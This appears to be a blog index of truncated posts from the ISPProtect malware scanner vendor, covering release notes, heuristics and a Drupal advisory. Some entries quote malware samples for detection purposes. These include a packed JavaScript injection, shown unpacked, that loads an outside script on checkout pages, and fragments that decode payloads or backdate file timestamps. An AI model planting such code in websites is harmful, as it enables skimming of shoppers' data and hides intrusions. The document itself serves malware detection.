As the zscaler team recently reported, there are frequent malware, phishing and virus finds in the .well-known directories on web servers. These directories are used, for example, to confirm domain ownership when a certificate is issued. The widely used “Let’s
New feature: wildcards in scan path
Today the new version 1.26.1 was released. From now on it is possible to use wildcards for the scan. For this there are the new parameters –include and –include-from, with which it is possible to narrow down the paths and
New scanner version (V1.26.0) reduces disk I/O
Today the new version 1.26.0 of the ISPProtect malware scanner was released. In this release there are some new features that make our scanner even better. Speed and disk I/O We’ve re-implemented the file search from scratch. This has enabled
Checking the WordPress settings after cleaning up a hacked or infected website
Few days ago I was hired to clean-up a hacked WordPress page that was affected by the security issue in the WP GDPR Compliance plugin. The attacker created a new admin user and changed/uploaded some files to WordPress. For that
New major release of ISPProtect Malware Scanner
Today we are proud to announce our next major release 1.25.0. What has changed? We introduced a new scan level 1.1 to the scan that searches for PHP code hidden inside of image file names. It is a wide-spread tactic
New version 1.24.13 with new malware heuristics
Today we released the new version 1.24.13 of ISPProtect malware scanner. It includes some new malware signatures and new heuristics for dynamic malware code of which we want to show you a new type of malware that is hard to
Severe remote execution security issue in Drupal announced
On March, 28th drupal announced a severe security issue in Drupal 7 and 8: https://www.drupal.org/sa-core-2018-002. The issue allows unprivileged users to execute code on the server and disclose all data normally not accesible through the web. The security issue is
New version 1.24.7 released
Today we released version 1.24.7 of ISPProtect. The new version contains new heuristics to recognize further malicious code. Following we take a closer look at some malicious code snippet. $a = base64_decode($b); for($i = 0; $i < strlen($a); $i++){ $a[$i]
New release 1.24.6 with redirect checks
Thew new release 1.24.6 of ISPProtect contains several improvements to malware heuristics and false positive lists. E. g., we added some checks for malicious redirects to foreign pages. Marius BurkardMarius Burkard has been working as a software developer for 20
New malware heuristics added
Today we released a new version of ISPProtect that contains improved malware heuristics. It focusses on malware that tries to hide itself or created files by setting file modification types to somewhat in the past. E. g.: <?php touch(‘/path/to/file’, time()
Added option to prevent Ioncube loading
With our new version we added a --no-ioncube switch. This is especially useful if you have installed a system-wide Ioncube loader that conflicts with the one loaded by ISPProtect. Marius BurkardMarius Burkard has been working as a software developer for
Version 1.24.0 with PHP 7.1 support
Today we released version 1.24.0 of our malware scanner ISPProtect. It adds support for PHP 7.1 and improves the starter script. Marius BurkardMarius Burkard has been working as a software developer for 20 years and has several years of experience
New release 1.23.1 with improved database scan options
The new release 1.23.1 of ISPProtect malware scanner adds some useful options to the database scan. --db-no-context hides the context output on hits that were found in databases. --db-exclude=<dbname> excludes database(s) with name <dbname> from the scanning process.You can use
ISPProtect malware scanner 1.23.0 released – unpacking JavaScript
Today we released version 1.23.0 of our malware scanning tool. With this release we added a feature to “unpack” some JavaScripts that were minified. For example: eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c]);return p}(‘1.4=5(){6((2 7(\’8|9|a\’)).b(1.c)){$$(\’d\’)[0].e(2 f(\’g\’,{h:\’i/j\’,k:\’l://m.n.o/p/3/q/r.3\’}))}}’,28,28,’|window|new|js|onload|function|if|RegExp|onepage|checkout|onestep|test|location|head|appendChild|Element|script|type|text|javascript|src|https|boutique|postedecoute|ca|media|shipping|ups’.split(‘|’),0,{})); will be unpacked to window.onload=function(){if((new RegExp(‘onepage|checkout|onestep’)).test(window.location)){$$(‘head’)[0].appendChild(new Element(‘script’,{type:’text/javascript’,src:’https://boutique.postedecoute.ca/media/js/shipping/ups.js’}))}}
New ISPProtect version 1.22.0 released
With the new version 1.22.0 of our malware scanner we introduced some additional features. Custom PHP version Sometimes you need to have several PHP versions installed on your server. Now you can decide which one of them is used by
New version 1.21.1 – and malware analysis
Today we released version 1.21.1 of our malware scanner ISPProtect. It adds further improvements and new signatures for an even better malware recognition. With this blog post we want to show you a crypted, let’s say creative, type of malware.
Version 1.21.0 released including smtp support
We just released our brand new version 1.21.0 of the ISPProtect malware scanner. It includes some new heuristics and updated signatures, but the main improvement is the possibility of sending mails through smtp instead of the internal PHP mail() function.
Deploy ISPProtect with Puppet
A Puppet Module for ISPProtect is available at Puppet Forge now. Puppet is a tool to automate the deployment and operation of software in large environments. The ISPProtect Puppet module, developed by Eelco Maljaars, can be found at Puppet Forge:
ISPProtect malware scanner version 1.19.0 – speed improvements
Today we released version 1.19.0 of the ISPProtect malware scanner. For this release we focussed on new malware signatures and a further improvement of scanning speed in level 2. We managed to lower the scan time to less than 50%
ISPProtect Website Blacklist Scan
Today version 1.18.0 of the ISPProtect scanner was released. This version contains a new (yet experimental) feature to check the domains of your server against blacklists. Why scan blacklists? Most modern Browsers like Firefox and Google Chrome contact blacklists like